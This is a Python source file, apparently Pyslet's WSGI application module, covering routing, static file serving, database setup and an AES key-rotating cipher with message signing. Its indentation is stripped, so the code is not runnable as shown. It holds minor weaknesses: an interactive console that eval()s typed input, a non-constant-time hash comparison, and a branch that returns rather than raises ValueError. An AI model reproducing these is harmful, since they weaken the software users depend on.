#: a threading.RLock instance that can be used to lock the class
#: when dealing with data that might be shared amongst threads.
clslock = threading.RLock()
_nextid = 1
@classmethod
def main(cls):
"""Runs the application
Options are parsed from the command line and used to
:meth:`setup` the class before an instance is created and
launched with :meth:`run_server`."""
parser = optparse.OptionParser()
cls.add_options(parser)
(options, args) = parser.parse_args()
cls.setup(options=options, args=args)
app = cls()
app.run_server()
@classmethod
def add_options(cls, parser):
"""Defines command line options.
parser
An OptionParser instance, as defined by Python's built-in
optparse module.
The following options are added to *parser* by the base
implementation:
-v Sets the logging level to WARNING, INFO or DEBUG
depending on the number of times it is specified.
Overrides the 'level' setting in the settings file.
-p, --port Overrides the value of the 'port' setting in the
settings file.
-i, --interactive Overrides the value of the 'interactive'
setting in the settings file.
--static Overrides the value of :attr:`static_files`.
--private Overrides the value of :attr:`private_files`.
--settings Sets the path to the :attr:`settings_file`."""
parser.add_option(
"-v", action="count", dest="logging",
default=None, help="increase verbosity of output up to 3x")
parser.add_option(
"-p", "--port", action="store", dest="port",
default=None, help="port on which to listen")
parser.add_option(
"-i", "--interactive", dest="interactive", action="store_true",
default=None,
help="Enable interactive prompt after starting server")
parser.add_option(
"--static", dest="static", action="store", default=None,
help="Path to the directory of static files")
parser.add_option(
"--private", dest="private", action="store", default=None,
help="Path to the directory for data files")
parser.add_option(
"--settings", dest="settings", action="store", default=None,
help="Path to the settings file")
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Perform one-time class setup
options
An optional object containing the command line options, such
as an optparse.Values instance created by calling parse_args
on the OptionParser instance passed to
:meth:`add_options`.
args
An optional list of positional command-line arguments such
as would be returned from parse_args after the options have
been removed.
All arguments are given as keyword arguments to enable use
of super and diamond inheritance.
The purpose of this method is to perform any actions required
to setup the class prior to the creation of any instances.
The default implementation loads the settings file and sets the
value of :attr:`settings`. If no settings file can be found
then an empty dictionary is created and populated with any
overrides parsed from options.
Finally, the root logger is initialised based on the level
setting.
Derived classes should always use super to call the base
implementation before their own setup actions are performed."""
if options and options.static:
cls.static_files = OSFilePath(options.static).abspath()
if options and options.private:
cls.private_files = OSFilePath(options.private).abspath()
if options and options.settings:
cls.settings_file = OSFilePath(options.settings).abspath()
if is_text(cls.settings_file):
cls.settings_file = OSFilePath(cls.settings_file)
cls.settings = {}
if cls.settings_file:
cls.base = URI.from_virtual_path(cls.settings_file)
if cls.settings_file.isfile():
with cls.settings_file.open('rb') as f:
cls.settings = json.loads(f.read().decode('utf-8'))
settings = cls.settings.setdefault('WSGIApp', {})
if options and options.logging is not None:
settings['level'] = (
logging.ERROR, logging.WARNING, logging.INFO,
logging.DEBUG)[min(options.logging, 3)]
level = settings.setdefault('level', None)
if level is not None:
logging.basicConfig(level=settings['level'])
if options and options.port is not None:
settings['port'] = int(options.port)
else:
settings.setdefault('port', 8080)
settings.setdefault(
'canonical_root', "http://localhost%s" %
("" if settings['port'] == 80 else (":%i" % settings['port'])))
if options and options.interactive is not None:
settings['interactive'] = options.interactive
else:
settings.setdefault('interactive', False)
url = settings.setdefault('static', None)
if cls.static_files is None and url:
cls.static_files = cls.resolve_setup_path(url)
if is_text(cls.static_files):
# catch older class definitions
cls.static_files = OSFilePath(cls.static_files)
url = settings.setdefault('private', None)
if cls.private_files is None and url:
cls.private_files = cls.resolve_setup_path(url)
if is_text(cls.private_files):
cls.private_files = OSFilePath(cls.private_files)
if cls.private_files:
cls.private_base = URI.from_virtual_path(
cls.private_files.join(''))
# this logging line forces the root logger to be initialised
# with the default level as a catch all
logging.debug("Logging configured for %s", cls.__name__)
@classmethod
def resolve_setup_path(cls, uri_path, private=False):
"""Resolves a settings-relative path
uri_path
The relative URI of a file or directory.
private (False)
Resolve relative to the private files directory
Returns uri_path as an OSFilePath instance after resolving relative
to the settings file location or to the private files location
as indicated by the private flag. If the required location is
not set then uri_path must be an absolute file URL (starting
with, e.g., file:///). On Windows systems the authority
component of the URL may be used to specify the host name for a
UNC path."""
url = URI.from_octets(uri_path)
if private and cls.private_base:
url = url.resolve(cls.private_base)
elif not private and cls.base:
url = url.resolve(cls.base)
if not url.is_absolute() and not isinstance(url, FileURL):
raise RuntimeError("Can't resolve setup path %s" % uri_path)
return url.get_virtual_file_path()
def __init__(self):
# keyword arguments end here, no more super after WSGIApp
DispatchNode.__init__(self)
#: flag: set to True to request :meth:`run_server` to exit
self.stop = False
with self.clslock:
#: a unique ID for this instance
self.id = WSGIApp._nextid
WSGIApp._nextid += 1
self.init_dispatcher()
def __cmp__(self, other):
if not isinstance(other, WSGIApp):
raise TypeError
# compare first by class name, then by instance ID
result = cmp(self.__class__.__name__, other.__class__.__name__)
if not result:
result = cmp(self.id, other.id)
return result
def __hash__(self):
return self.id
def init_dispatcher(self):
"""Used to initialise the dispatcher.
By default all requested paths generate a 404 error. You
register pages during :meth:`init_dispatcher` by calling
:meth:`set_method`. Derived classes should use super
to pass the call to their parents."""
pass
def set_method(self, path, method):
"""Registers a bound method in the dispatcher
path
A path or path pattern
method
A bound method or callable with the basic signature::
result = method(context)
A star in the path is treated as a wildcard and matches a
complete path segment. A star at the end of the path (which
must be after a '/') matches any sequence of path segments. The
matching sequence may be empty, in other words, "/images/*"
matches "/images/". In keeping with common practice a missing
trailing slash is ignored when dispatching so "/images" will
also be routed to a method registered with "/images/*" though if
a separate registration is made for "/images" it will be matched
in preference.
Named matches always take precedence over wildcards so you can
register "/images/*" and "/images/counter.png" and the latter
path will be routed to its preferred handler. Similarly you can
register "/*/background.png" and "/home/background.png" but
remember the '*' only matches a single path component! There is
no way to match background.png in any directory."""
path = path.split('/')
if not path:
path = ['']
node = self
pleft = len(path)
for p in path:
pleft -= 1
old_node = node
if p == '*' and not pleft:
# set a special flag, e.g., if /a/* is declared and we
# have an unmatched /a we'll call that handler anyway
old_node._wildcard = method
node = old_node._nodes.get(p, None)
if not node:
node = DispatchNode()
old_node._nodes[p] = node
node._handler = method
def call_wrapper(self, environ, start_response):
"""Alternative entry point for debugging
Although instances are callable you may use this method instead
as your application's entry point when debugging.
This method will log the environ variables, the headers output
by the application and all the data (in quoted-printable form)
returned at DEBUG level.
It also catches a common error, that of returning something
other than a string for a header value or in the generated
output. These are logged at ERROR level and converted to
strings before being passed to the calling framework."""
# make a closure
def wrap_response(status, response_headers, exc_info=None):
if not is_ascii(status):
logger.error("Value for status line: %s", repr(status))
status = force_ascii(to_text(status))
logger.debug("*** START RESPONSE ***")
logger.debug(status)
new_headers = []
for h, v in response_headers:
if not is_ascii(h):
logger.error("Header name: %s", repr(h))
h = force_ascii(to_text(h))
if not is_ascii(v):
logger.error("Header value: %s: %s", h, repr(v))
v = force_ascii(to_text(v))
logger.debug("%s: %s", h, v)
new_headers.append((h, v))
return start_response(status, new_headers, exc_info)
logger.debug("*** START REQUEST ***")
for key in environ:
logger.debug("%s: %s", key, str(environ[key]))
blank = False
for data in self(environ, wrap_response):
if not blank:
logger.debug("")
blank = True
if not isinstance(data, bytes):
logger.error("Bad type for response data in %s\n%s",
str(environ['PATH_INFO']), repr(data))
if is_unicode(data):
data = data.encode('utf-8')
else:
data = bytes(data)
else:
logger.debug(quopri.encodestring(data))
yield data
def __call__(self, environ, start_response):
context = self.ContextClass(
environ, start_response,
self.settings['WSGIApp']['canonical_root'])
try:
path = context.environ['PATH_INFO'].split('/')
if not path:
# empty path
path = ['']
i = 0
node = self
wildcard = None
stack = []
while i < len(path):
p = path[i]
old_node = node
wild_node = old_node._nodes.get('*', None)
node = old_node._nodes.get(p, None)
if node:
if wild_node:
# this is a fall-back node, push it
stack.append((i, wild_node, wildcard))
elif wild_node:
node = wild_node
elif wildcard:
# if there is an active wildcard, use it
break
elif stack:
i, node, wildcard = stack.pop()
else:
break
if node._wildcard is not None:
wildcard = node._wildcard
i += 1
if node and node._handler is not None:
return node._handler(context)
if wildcard:
return wildcard(context)
# we didn't find a handler
return self.error_page(context, 404)
except MethodNotAllowed:
return self.error_page(context, 405)
except PageNotFound:
return self.error_page(context, 404)
except PageNotAuthorized:
return self.error_page(context, 403)
except BadRequest:
return self.error_page(context, 400)
except Exception as e:
logger.exception(context.environ['PATH_INFO'])
return self.internal_error(context, e)
def static_page(self, context):
"""Returns a static page
This method can be bound to any path using :meth:`set_method`
and it will look in the :attr:`static_files` directory for that
file. For example, if static_files is "/var/www/html" and the
PATH_INFO variable in the request is "/images/logo.png" then the
path "/var/www/html/images/logo.png" will be returned.
There are significant restrictions on the names of the path
components. Each component *must* match a basic label syntax
(equivalent to the syntax of domain labels in host names) except
the last component which must have a single '.' separating two
valid labels. This conservative syntax is designed to be safe
for passing to file handling functions."""
path = context.environ['PATH_INFO'].split('/')
file_path = self.static_files
if file_path is None:
raise PageNotFound
ext = ''
pleft = len(path)
for p in path:
pleft -= 1
if pleft:
# ignore empty components
if not p:
continue
# this path component must be a directory we re-use the
# ldb-label test from the cookie module to ensure we
# have a very limited syntax. Apologies if you wanted
# fancy URLs.
if not cookie.is_ldh_label(p.encode('ascii')):
raise PageNotFound
file_path = file_path.join(p)
if not file_path.isdir():
raise PageNotFound
elif not p:
# this is the directory form, e.g., /app/docs/ but we
# don't support indexing, we're not Apache
raise PageNotFound
else:
# last component must be a filename.ext form
splitp = p.split('.')
if (len(splitp) != 2 or
not cookie.is_ldh_label(splitp[0].encode('ascii')) or
not cookie.is_ldh_label(splitp[1].encode('ascii'))):
raise PageNotFound
filename = p
ext = splitp[1]
file_path = file_path.join(p)
if not file_path.isfile():
raise PageNotFound
# Now the MIME mapping
ctype = self.content_type.get(ext, None)
if ctype is None:
ctype, encoding = mimetypes.guess_type(filename)
if ctype is not None:
ctype = params.MediaType.from_str(ctype)
if encoding is not None:
context.add_header("Content-Encoding", encoding)
if ctype is None:
ctype = params.APPLICATION_OCTETSTREAM
context.set_status(200)
context.add_header("Content-Type", str(ctype))
return self.file_response(context, file_path)
def file_response(self, context, file_path):
"""Returns a file from the file system
file_path
The system file path of the file to be returned as an
:class:`pyslet.vfs.OSFilePath` instance.
The Content-Length header is set from the file size, the
Last-Modified date is set from the file's st_mtime and the
file's data is returned in chunks of :attr:`MAX_CHUNK` in the
response.
The status is *not* set and must have been set before calling
this method."""
if is_text(file_path):
file_path = OSFilePath(file_path)
finfo = file_path.stat()
context.add_header("Content-Length", str(finfo.st_size))
context.add_header("Last-Modified",
str(params.FullDate.from_unix_time(finfo.st_mtime)))
context.start_response()
bleft = finfo.st_size
with file_path.open('rb') as f:
while bleft:
chunk_size = min(bleft, self.MAX_CHUNK)
chunk = f.read(chunk_size)
if not chunk:
# unexpected EOF while reading
raise RuntimeError("Unexpected EOF")
bleft -= len(chunk)
yield chunk
def html_response(self, context, data):
"""Returns an HTML page
data
A string containing the HTML page data. This may be a
unicode or binary string.
The Content-Type header is set to text/html (with an explicit
charset if data is a unicode string). The status is *not* set and
must have been set before calling this method."""
if is_unicode(data):
data = data.encode('utf-8')
context.add_header("Content-Type", "text/html; charset=utf-8")
else:
context.add_header("Content-Type", "text/html")
# catch the odd case where data is a subclass of str - still ok
# but the default WSGI server uses this stronger test!
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def json_response(self, context, data):
"""Returns a JSON response
data
A string containing the JSON data. This may be a unicode or
binary string (encoded with utf-8).
The Content-Type is set to "application/json". The status is
*not* set and must have been set before calling this method."""
if is_unicode(data):
data = data.encode('utf-8')
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Type", "application/json")
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def text_response(self, context, data):
"""Returns a plain text response
data
A string containing the text data. This may be a unicode or
binary string (encoded with US-ASCII).
The Content-Type is set to "text/plain" (with an explicit
charset if a unicode string is passed). The status is *not* set
and must have been set before calling this method.
Warning: do not encode unicode strings before passing them to
this method as data, if you do you risk problems with non-ASCII
characters as the default charset for text/plain is US-ASCII and
not UTF-8 or ISO8859-1 (latin-1)."""
if is_unicode(data):
data = data.encode('utf-8')
context.add_header("Content-Type", "text/plain; charset=utf-8")
else:
context.add_header("Content-Type", "text/plain")
if not isinstance(data, bytes):
data = bytes(data)
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def redirect_page(self, context, location, code=303):
"""Returns a redirect response
location
A :class:`~pyslet.rfc2396.URI` instance or a string of
octets.
code (303)
The redirect status code. As a reminder the typical codes
are 301 for a permanent redirect, a 302 for a temporary
redirect and a 303 for a temporary redirect following a POST
request. This latter code is useful for implementing the
widely adopted pattern of always redirecting the user after
a successful POST request to prevent browsers prompting for
re-submission and is therefore the default.
This method takes care of setting the status, the Location
header and generating a simple HTML redirection page response
containing a clickable link to *location*."""
data = """<html>
<head><title>Redirect</title></head>
<body>
<p>Please <a href=%s>click here</a> if not redirected automatically</p>
</body></html>""" % xml.escape_char_data7(str(location), True)
context.add_header("Location", str(location))
context.add_header("Content-Type", "text/html")
context.add_header("Content-Length", str(len(data)))
context.set_status(code)
context.start_response()
return [force_bytes(data)]
def error_page(self, context, code=500, msg=None):
"""Generates an error response
code (500)
The status code to send.
msg (None)
An optional plain-text error message. If not given then the
status line is echoed in the body of the response."""
context.set_status(code)
if msg is None:
msg = force_bytes("%i %s" % (code, context.status_message))
context.add_header("Content-Type", "text/plain")
elif is_unicode(msg):
try:
msg = msg.encode('ascii')
context.add_header("Content-Type", "text/plain")
except UnicodeError:
msg = msg.encode('utf-8')
context.add_header("Content-Type", "text/plain; charset=utf-8")
else:
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(msg)))
context.start_response()
return [msg]
def internal_error(self, context, err):
context.set_status(500)
data = force_bytes(
"%i %s\r\n%s" % (context.status, context.status_message, str(err)))
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(data)))
try:
context.start_response()
except Exception:
# log this error and move on as we're already returning a 500
logging.error(
"Error raised by WSGIApp.internal_error: %s",
"".join(traceback.format_exception(*sys.exc_info())))
return [data]
def _run_server_thread(self):
"""Starts the web server running"""
port = self.settings['WSGIApp']['port']
server = make_server('', port, self.call_wrapper)
logger.info("HTTP server on port %i running", port)
# Respond to requests until process is killed
while not self.stop:
server.handle_request()
def run_server(self):
t = threading.Thread(target=self._run_server_thread)
t.setDaemon(True)
t.start()
logger.info("Starting %s server on port %s", self.__class__.__name__,
self.settings['WSGIApp']['port'])
if self.settings['WSGIApp']['interactive']:
# loop around getting commands
while not self.stop:
cmd = input3('cmd: ')
if cmd.lower() == 'stop':
self.stop = True
elif cmd:
try:
sys.stdout.write((to_text(eval(cmd))))
except Exception as err:
sys.stdout.write("Error: %s " % to_text(err))
sys.exit()
else:
t.join()
class WSGIDataApp(WSGIApp):
"""Extends WSGIApp to include a data store
The key 'WSGIDataApp' is reserved for settings defined by this
class in the settings file. The defined settings are:
container (None)
The name of the container to use for the data store. By
default, the default container is used. For future
compatibility you should not depend on using this option.
metadata (None)
URI of the metadata file containing the data schema. The file
is assumed to be relative to the settings_file.
source_type ('sqlite')
The type of data source to create. The default value
is sqlite. A value of 'mysql' select's Pyslet's mysqldbds
module instead.
sqlite_path ('database.sqlite3')
URI of the database file. The file is assumed to be relative to
the private_files directory, though an absolute path may be
given.
dbhost ('localhost')
For mysql databases, the hostname to connect to.
dname (None)
The name of the database to connect to.
dbuser (None)
The user name to connect to the database with.
dbpassword (None)
The password to use in conjunction with dbuser
keynum ('0')
The identification number of the key to use when storing
encrypted data in the container.
secret (None)
The key corresponding to keynum. The key is read in plain text
from the settings file and must be provided in order to use the
:attr:`app_cipher` for managing encrypted data and secure
hashing. Derived classes could use an alternative mechanism for
reading the key, for example, using the keyring_ python module.
cipher ('aes')
The type of cipher to use. By default :class:`AESAppCipher` is
used which uses AES_ internally with a 256 bit key created by
computing the SHA256 digest of the secret string. The only
other supported value is 'plaintext' which does not provide any
encryption but allows the app_cipher object to be used in cases
where encryption may or may not be used depending on the
deployment environment. For example, it is often useful to turn
off encryption in a development environment!
when (None)
An optional value indicating when the specified secret comes
into operation. The value should be a fully specified time
point in ISO format with timezone offset, such as
'2015-01-01T09:00:00-05:00'. This value is used when the
application is being restarted after a key change, for details
see :meth:`AppCipher.change_key`.
The use of AES requires the PyCrypto module to be installed.
.. _keyring: https://pypi.python.org/pypi/keyring
.. _AES:
http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"""
@classmethod
def add_options(cls, parser):
"""Adds the following options:
-s, --sqlout print the suggested SQL database schema and
then exit. The setting of --create is
ignored.
--create_tables create tables in the database
-m. --memory Use an in-memory SQLite database. Overrides
any source_type and encryption setting
values . Implies --create_tables"""
super(WSGIDataApp, cls).add_options(parser)
parser.add_option(
"-s", "--sqlout", dest="sqlout", action="store_true",
default=False, help="Write out SQL script and quit")
parser.add_option(
"--create_tables", dest="create_tables", action="store_true",
default=False, help="Create tables in the database")
parser.add_option(
"-m", "--memory", dest="in_memory", action="store_true",
default=False, help="Use in-memory sqlite database")
#: the metadata document for the underlying data service
metadata = None
#: the data source object for the underlying data service the type
#: of this object will vary depending on the source type. For
#: SQL-type containers this will be an instance of a class derived
#: from :class:`~pyslet.odata2.sqlds.SQLEntityContainer`
data_source = None
#: the entity container (cf database)
container = None
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Adds database initialisation
Loads the :attr:`metadata` document. Creates the
:attr:`data_source` according to the configured :attr:`settings`
(creating the tables only if requested in the command line
options). Finally sets the :attr:`container` to the entity
container for the application.
If the -s or --sqlout option is given in options then the data
source's create table script is output to standard output and
sys.exit(0) is used to terminate the process."""
super(WSGIDataApp, cls).setup(options, args, **kwargs)
settings = cls.settings.setdefault('WSGIDataApp', {})
metadata_file = settings.setdefault('metadata', None)
if metadata_file:
metadata_file = cls.resolve_setup_path(metadata_file)
# load the metadata document for our data layer
cls.metadata = edmx.Document()
with metadata_file.open('rb') as f:
cls.metadata.read(f)
else:
cls.metadata = cls.load_default_metadata()
container_name = settings.setdefault('container', None)
if container_name:
cls.container = cls.metadata.root.DataServices[container_name]
else:
cls.container = cls.metadata.root.DataServices.defaultContainer
if options and options.create_tables:
create_tables = True
else:
create_tables = False
if options and options.in_memory:
source_type = "sqlite"
sqlite_path = ':memory:'
create_tables = True
else:
source_type = settings.setdefault('source_type', 'sqlite')
if source_type == 'sqlite':
# do sqlite settings here
if options and options.sqlout:
# use an in-memory database
sqlite_path = ':memory:'
else:
sqlite_path = settings.setdefault(
'sqlite_path', 'database.sqlite3')
sqlite_path = cls.resolve_setup_path(
sqlite_path, private=True)
elif source_type == 'mysql':
dbhost = settings.setdefault('dbhost', 'localhost')
dbname = settings.setdefault('dbname', None)
dbuser = settings.setdefault('dbuser', None)
dbpassword = settings.setdefault('dbpassword', None)
if source_type == 'sqlite':
from pyslet.odata2.sqlds import SQLiteEntityContainer
# accepts either the string ":memory:" or an OSFilePath
cls.data_source = SQLiteEntityContainer(
file_path=sqlite_path, container=cls.container)
elif source_type == 'mysql':
from pyslet.mysqldbds import MySQLEntityContainer
cls.data_source = MySQLEntityContainer(
host=dbhost, user=dbuser, passwd=dbpassword, db=dbname,
container=cls.container)
else:
raise ValueError("Unknown data source type: %s" % source_type)
if isinstance(cls.data_source, SQLEntityContainer):
if options and options.sqlout:
out = io.StringIO()
cls.data_source.create_all_tables(out=out)
sys.stdout.write(out.getvalue())
sys.exit(0)
elif create_tables:
cls.data_source.create_all_tables()
settings.setdefault('keynum', 0)
if options and options.in_memory and 'AppKeys' in cls.container:
settings.setdefault('secret', generate_key())
settings.setdefault('cipher', 'plaintext')
else:
settings.setdefault('secret', None)
settings.setdefault('cipher', 'aes')
settings.setdefault('when', None)
@classmethod
def load_default_metadata(cls):
raise RuntimeError("No path to metadata")
@classmethod
def new_app_cipher(cls):
"""Creates an :class:`AppCipher` instance
This method is called automatically on construction, you won't
normally need to call it yourself but you may do so, for
example, when writing a script that requires access to data
encrypted by the application.
If there is no 'secret' defined then None is returned.
Reads the values from the settings file and creates an instance
of the appropriate class based on the cipher setting value. The
cipher uses the 'AppKeys' entity set in :attr:`container` to store
information about expired keys. The AppKey entities have the
following three properties:
KeyNum (integer key)
The key identification number
KeyString (string)
The *encrypted* secret, for example::
'1:OBimcmOesYOt021NuPXTP01MoBOCSgviOpIL'
The number before the colon is the key identification number
of the secret used to encrypt the string (and will always be
different from the KeyNum field of course). The data after
the colon is the base-64 encoded encrypted string. The same
format is used for all data enrypted by
:class:`AppCipher` objects. In this case the secret was the
word 'secret' and the algorithm used is AES.
Expires (DateTime)
The UTC time at which this secret will expire. After this
time a newer key should be used for encrypting data though
this key may of course still be used for decrypting data."""
keynum = cls.settings['WSGIDataApp']['keynum']
secret = cls.settings['WSGIDataApp']['secret']
cipher = cls.settings['WSGIDataApp']['cipher']
when = cls.settings['WSGIDataApp']['when']
if when:
when = iso.TimePoint.from_str(when)
if cipher == 'plaintext':
cipher_class = AppCipher
elif cipher == 'aes':
cipher_class = AESAppCipher
else:
# danger, raise an error
raise RuntimeError("Unknown cipher: %s" % cipher)
if secret:
return cipher_class(keynum, secret.encode('utf-8'),
cls.container['AppKeys'], when)
else:
return None
def __init__(self, **kwargs):
super(WSGIDataApp, self).__init__(**kwargs)
#: the application's cipher, a :class:`AppCipher` instance.
self.app_cipher = self.new_app_cipher()
class PlainTextCipher(object):
def __init__(self, key):
self.key = key
def encrypt(self, data):
return data
def decrypt(self, data):
return data
def hash(self, data):
return sha256(data + self.key).digest()
class AESCipher(object):
def __init__(self, key):
self.key = sha256(key).digest()
def encrypt(self, data):
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CFB, iv)
return iv + cipher.encrypt(data)
def decrypt(self, data):
iv = data[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CFB, iv)
return cipher.decrypt(data[AES.block_size:])
def hash(self, data):
return sha256(data + self.key).digest()
class AppCipher(object):
"""A cipher for encrypting application data
key_num
A key number
key
A binary string containing the application key.
key_set
An entity set used to store previous keys. The entity set must
have an integer key property 'KeyNum' and a string field
'KeyString'. The string field must be large enough to contain
encrypted versions of previous keys.
when (None)
A fully specified :class:`pyslet.iso8601.TimePoint` at which
time the key will become active. If None, the key is active
straight away. Otherwise, the key_set is searched for a key
that is still active and that key is used when encrypting data
until the when time, at which point the given key takes over.
The object wraps an underlying cipher. Strings are encrypted using
the cipher and then encoded using base64. The output is then
prefixed with an ASCII representation of the key number (key_num)
followed by a ':'. For example, if key_num is 7 and the cipher
is plain-text (the default) then encrypt("Hello") results in::
"7:SGVsbG8="
When decrypting a string, the key number is parsed and matched
against the key_num of the key currently in force. If the string
was encrypted with a different key then the key_set is used to look
up that key (which is itself encrypted of course). The process
continues until a key encrypted with key_num is found.
The upshot of this process is that you can change the key associated
with an application. See :meth:`change_key` for details."""
#: the maximum age of a key, which is the number of times the key
#: can be changed before the original key is considered too old to
#: be used for decryption.
MAX_AGE = 100
def __init__(self, key_num, key, key_set, when=None):
self.lock = threading.RLock()
self.key_set = key_set
self.key_num = key_num
self.key = key
self.ciphers = {key_num: self.new_cipher(key)}
if when:
# we need to find a key that hasn't expired
with key_set.open() as keys:
t = edm.EDMValue.from_type(edm.SimpleType.DateTime)
t.set_from_value(time.time())
filter = odata.CommonExpression.from_str(
"Expires gte :t", {'t': t})
keys.set_filter(filter)
# Only interested in keys that haven't expired
old_keys = keys.values()
if not old_keys:
raise RuntimeError("AppCipher: no current key")
old_key = old_keys[0]
self.old_num = old_key['KeyNum'].value
self.old_key = self.decrypt(old_key['KeyString'])
self.old_expires = when.get_unixtime()
self.ciphers[self.old_num] = self.new_cipher(self.old_key)
else:
self.old_num = None
self.old_key = None
self.old_expires = None
def new_cipher(self, key):
"""Returns a new cipher object with the given key
The default implementation creates a plain-text 'cipher' and is
not suitable for secure use of encrypt/decrypt but, with a
sufficiently good key, may still be used for hashing."""
return PlainTextCipher(key)
def change_key(self, key_num, key, when):
"""Changes the key of this application.
key_num
The number given to the new key, must differ from the last
:attr:`MAX_AGE` key numbers.
key
A binary string containing the new application key.
when
A fully specified :class:`pyslet.iso8601.TimePoint` at which
point the new key will come into effect.
Many organizations have a policy of changing keys on a routine
basis, for example, to ensure that people who have had temporary
access to the key only have temporary access to the data it
protects. This method makes it easier to implement such a
policy for applications that use the AppCipher class.
The existing key is encrypted with the new key and a record is
written to the :attr:`key_set` to record the *existing* key
number, the encrypted key string and the *when* time, which is
treated as an expiry time in this context.
This procedure ensures that strings encrypted with an old key
can always be decrypted because the value of the old key can be
looked up. Although it is encrypted, it will be encrypted with
a new(er) key and the procedure can be repeated as necessary
until a key encrypted with the newest key is found.
The key change process then becomes:
1. Start a utility process connected to the application's
entity container using the existing key and then call the
change_key method. Pass a value for *when* that will give
you time to reconfigure all AppCipher clients. Assuming the
key change is planned, a time in hours or even days ahead
can be used.
2. Update or reconfigure all existing applications so that they
will be initialised with the new key and the same value for
*when* next time they are restarted.
3. Restart/refresh all running applications before the change
over time. As this does not need to be done simultaneously,
a load balanced set of application servers can be cycled on
a schedule to ensure continuous running).
Following a key change the entity container will still contain
data encrypted with old keys and the architecture is such that
compromise of a key is sufficient to read all encrypted data
with that key and all previous keys. Therefore, changing the
key only protects new data.
In situations where policy dictates a key change it might make
sense to add a facility to the application for re-encrypting
data in the data store by going through a
read-decrypt/encrypt-write cycle with each protected data field.
Of course, the old key could still be used to decrypt this
information from archived backups of the data store.
Alternatively, if the protected data is itself subject to change
on a routine basis you may simply rely on the natural turnover
of data in the application. The strategy you choose will depend
on your application.
The :attr:`MAX_AGE` attribute determines the maximum number of
keys that can be in use in the data set simultaneously.
Eventually you will have to update encrypted data in the data
store."""
with self.lock:
self.old_num = self.key_num
self.old_key = self.key
self.old_expires = when.get_unixtime()
# we should already have a cipher for this key
self.key_num = key_num
self.key = key
cipher = self.ciphers[key_num] = self.new_cipher(key)
# we can't use the encrypt method here as we want to force
# use of the new key
old_key_encrypted = "%i:%s" % (
key_num, force_ascii(base64.b64encode(cipher.encrypt(
self.old_key))))
with self.key_set.open() as keys:
e = keys.new_entity()
e.set_key(self.old_num)
e['KeyString'].set_from_value(old_key_encrypted)
e['Expires'].set_from_value(when)
try:
keys.insert_entity(e)
except edm.ConstraintError:
# Presumably this entity already exists, possible race
# condition on change_key - load the entity from the old
# key number to raise KeyError if not
e = keys[self.old_num]
def _get_current_cipher(self):
if self.old_expires:
if time.time() > self.old_expires:
# the old key has finally expired
self.old_num = None
self.old_key = None
self.old_expires = None
else:
# use the old key
return self.old_num, self.ciphers[self.old_num]
return self.key_num, self.ciphers[self.key_num]
def _get_cipher(self, num):
stack = [(num, None, None)]
while stack:
key_num, key_data, cipher_num = stack.pop()
cipher = self.ciphers.get(key_num, None)
if cipher is None:
stack.append((key_num, key_data, cipher_num))
with self.key_set.open() as collection:
try:
e = collection[key_num]
old_key_num, old_key_data = self._split_data(
e['KeyString'].value)
if len(stack) > self.MAX_AGE:
raise KeyError
stack.append((old_key_num, old_key_data, key_num))
except KeyError:
raise RuntimeError("AppCipher: key too old")
elif key_data:
with self.lock:
new_data = cipher.decrypt(key_data)
if cipher_num is not None:
self.ciphers[cipher_num] = self.new_cipher(new_data)
else:
return cipher
def encrypt(self, data):
"""Encrypts data with the current key.
data
A binary input string.
Returns a character string of ASCII characters suitable for
storage."""
with self.lock:
num, cipher = self._get_current_cipher()
return "%i:%s" % (
num, force_ascii(base64.b64encode(cipher.encrypt(data))))
def decrypt(self, data):
"""Decrypts data.
data
A character string containing the encrypted data
Returns a binary string containing the decrypted data."""
key_num, data = self._split_data(data)
cipher = self._get_cipher(key_num)
return cipher.decrypt(data)
def sign(self, message):
"""Signs a message with the current key.
message
A binary message string.
Returns a character string of ASCII characters containing a
signature of the message. It is recommended that character
strings are encoded using UTF-8 before signing."""
with self.lock:
num, cipher = self._get_current_cipher()
salt = os.urandom(4)
hash = cipher.hash(salt + message)
return "%i-%s-%s" % (num, force_ascii(binascii.hexlify(salt)),
force_ascii(binascii.hexlify(hash)))
def check_signature(self, signature, message=None):
"""Checks a signature returned by sign
signature
The ASCII signature to be checked for validity.
message
A binary message string. This is optional, if None then the
message will be extracted from the signature string
(reversing ascii_sign).
On success the method returns the validated message (a binary
string) and on failure it raises ValueError."""
num, salt, hash, smessage = self._split_signature(signature)
try:
num = int(num)
salt = binascii.unhexlify(salt)
hash = binascii.unhexlify(hash)
if smessage:
smessage = unescape_data(smessage)
if message:
# must match exactly!
if message != smessage:
raise ValueError
else:
message = smessage
with self.lock:
cipher = self._get_cipher(num)
if cipher is None:
return ValueError
if cipher.hash(salt + message) == hash:
return message
else:
raise ValueError
except TypeError:
raise ValueError
def ascii_sign(self, message):
"""Signs a message with the current key
message
A binary message string
The difference between ascii_sign and sign is that ascii_sign
returns the entire message, including the signature, as a
URI-encoded character string suitable for storage and/or
transmission.
The message is %-encoded (as implemented by
:func:`pyslet.rfc2396.escape_data`). You may apply the
corresponding unescape data function to the entire string to get
a binary string that *contains* an exact copy of the original
data."""
return "%s-%s" % (self.sign(message), escape_data(message))
def _split_data(self, data):
data = data.split(':')
if len(data) != 2 or not data[0].isdigit():
raise ValueError
key_num = int(data[0])
try:
data = base64.b64decode(data[1])
except TypeError:
raise ValueError
return key_num, data
def _split_signature(self, signature):
result = []
pos = 0
while True:
if len(result) == 3:
result.append(signature[pos:])
return result
new_pos = signature.find('-', pos)
if new_pos < 0:
result.append(signature[pos:])
while len(result) < 4:
result.append('')
return result
result.append(signature[pos:new_pos])
pos = new_pos + 1
class AESAppCipher(AppCipher):
"""A cipher object that uses AES to encrypt the data
The Pycrypto module must be installed to use this class.
The key is hashed using the SHA256 algorithm to obtain a 32 byte
value for the AES key. The encrypted strings contain random
initialisation vectors so repeated calls won't generate the same
encrypted values. The CFB mode of operation is used."""
def new_cipher(self, key):
return AESCipher(key)
